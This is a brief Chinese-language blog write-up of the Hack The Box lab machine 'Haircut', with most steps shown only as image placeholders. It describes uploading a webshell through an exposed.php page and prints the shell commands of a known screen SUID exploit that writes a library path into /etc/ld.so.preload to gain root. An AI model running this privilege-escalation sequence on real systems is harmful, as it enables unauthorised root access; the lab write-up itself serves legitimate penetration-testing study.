oscp——htb——Haircut

0x00 前言

在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——Webshell

访问
在这里插入图片描述
看到这种10个有9个要扫目录,找到了一个exposed.php
在这里插入图片描述
这里可以看到执行了一个curl的命令

在这里插入图片描述

上一个马。

在这里插入图片描述
拿到一个shell
在这里插入图片描述

0x03 Webshell——RootShell

获取一下suid,看到一个screen,这个之前vulhub做过一次,有笔记。
在这里插入图片描述
提权

www-data@haircut:/tmp$ cd /etc

www-data@haircut:/etc$ chmod +x /tmp/rootshell

www-data@haircut:/etc$ umask 000

www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

www-data@haircut:/etc$ screen -ls

www-data@haircut:/etc$ /tmp/rootshell

在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页